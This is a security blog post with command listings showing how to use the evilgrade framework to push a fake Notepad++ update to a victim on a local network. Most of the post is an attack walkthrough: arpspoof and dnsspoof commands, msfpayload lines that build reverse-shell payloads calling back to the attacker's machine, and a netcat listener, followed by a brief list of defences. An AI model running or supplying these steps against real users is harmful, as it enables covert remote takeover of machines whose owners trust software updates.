evilGrade[v0.1.3].sh + evilGrade_install[v0.1.3].sh

EvilGrade: "ISR-evilgrade: is a modular framework that allow us to take advantage of poor upgrade implementations by injecting fake updates."

Metasploit: "Evilgrade Will Destroy Us All."

This is a "semi automate" script to help set-up an environment for EvilGrade so it can work its magic, and then there is a video demonstrating it in action which shows the effects of EvilGrade. EvilGrade is simply, another "option" to do after performing a "Man In The Middle" attack, that tricks certain software to believe there is an update available when really it's the attacker payload.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/evilGrade_v0.1.mp4

Download script (evilGrade[v0.1.3].sh): *Coming soon*

Download script (evilGrade_install[v0.1.3].sh): *Coming soon*

Method

EvilGrade: "It works with modules, each module implements the structure needed to emulate a false update of specific applications/systems.Evilgrade needs the manipulation of the victim dns traffic."

EvilGrade creates a web server, which when a program's auto-update feature queries back "home" to check for an update, EvilGrade creates a spoofed updated version. The program then notify the target that there is an "update" available, and would they like to update. The danger of this is most users trust the program with the "auto update feature" and download and executes the update, when in reality, this is our payload.

Tools

  • EvilGrade Any Requirements - (Data::Dump, Digest::MD5, Time::HiRes)
  • A Payload - (I'm using metasploit and SBD)
  • A method of doing a MITM Attack - (I'm using arpspoof - part of dsniff suite)
  • A way to spoof DNS - (I'm using dnsspoof - part of dsniff suite)
  • evilGrade[v0.1.3].sh - (only if you wish for a helping hand to automate a few steps)
  • evilGrade_install[v0.1.3].sh - (only if you wish for a helping hand to get this working with BackTrack 4 Final)

How to use it?

  1. Download the script(s).
  2. Install EvilGrade (If your lazy use the script!).
  3. Check to see what interface is going to be used (via ifconfig).
  4. Edit evilGrade[v0.1.3].sh (via kate evilGrade[v0.1.3].sh) to make it work with your system.
  5. bash evilGrade[v0.1.3].sh OR bash evilGrade[v0.1.3].sh TargetsIP (bash evilGrade[v0.1.3].sh 192.168.1.101).
  6. Pick your which software to attack (via show modules).
  7. Pick your "agent" (Which program to insert/inject/replace the update).
  8. Check any other options (via show options).
  9. Start
  10. Wait...
  11. ...Game Over.

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
sh evilGrade_install\[v0.1.3\].sh
help
show modules
exit

ifconfig
kate evilGrade\[v0.1.3\].sh
bash \[v0.1.3\].sh
192.168.1.101
config notepadplus
set agent '["/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.103 X > /tmp/g0tmi1k-evilgrade.exe"]'
start

hostname
ipconfig

Misc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# Our IP = 192.168.1.103
# Target IP = 192.168.1.100
# Gatewaty = 192.168.1.1
# Interface = eth0
# http://search.cpan.org/CPAN/authors/id/G/GA/GAAS/Digest-MD5-2.36.tar.gz
# http://search.cpan.org/CPAN/authors/id/J/JH/JHI/Time-HiRes-1.9715.tar.gz

cd ~
wget ftp://ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/distfiles/Data-Dump-1.08.tar.gz
tar xvfz Data-Dump-1.08.tar.gz
rm Data-Dump-1.08.tar.gz
cd Data-Dump-1.08/
perl Makefile.PL
make
make install
rm -rf ~/Data-Dump-1.08/

cd ~
wget http://www.infobyte.com.ar/down/isr-evilgrade-1.0.0.tar.gz
tar zxvf isr-evilgrade-1.0.0.tar.gz
rm isr-evilgrade-1.0.0.tar.gz

/etc/init.d/apache2 stop

cd isr-evilgrade/
./evilgrade

show modules
config notepadplus
show options
set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.1.103 LHOST=4444 X > <%OUT%>/tmp/g0tmi1k-evilgrade.exe<%OUT%>"]'
start


echo 1 > /proc/sys/net/ipv4/ip_forward

echo "192.168.1.103 notepad-plus.sourceforge.net" > /tmp/host.dns
dnsspoof -i eth0 -f /tmp/host.dns

arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

nc -l -v -p 4321

How can I protect myself from this?

  • Don't use the self updating features on software.
  • When prompted about an update, visit the official homepage to download the update.
  • Check the official homepage for a MD5/SHA1 hash.

Notes

  • The video uses evilGrade[v0.1].sh.
  • It's worth doing this "manually" (without the script) before using the script, so you have an idea of what's happening, and why. The script is only meant to save time.

Song: Public Domain - Operation Blade

Video length: 2:44

Capture length: 7:59

Blog Post: https://blog.g0tmi1k.com/2010/06/script-video-evilgrade-v013-evilgrade_install/

v0.1.3

  • +Added arguments
  • +Checks for superuser
  • +Checks interfaces/paths/files exists
  • *Fix it - Couple of silly typos
  • *General code improvements
  • *Improved checking the targets IP Address

v0.1.2

  • +Added debug mode
  • +Added custom payload
  • +Checks system setup before running
  • +Fix gateway bug
  • *General code improvements

v0.1.1

  • +First public release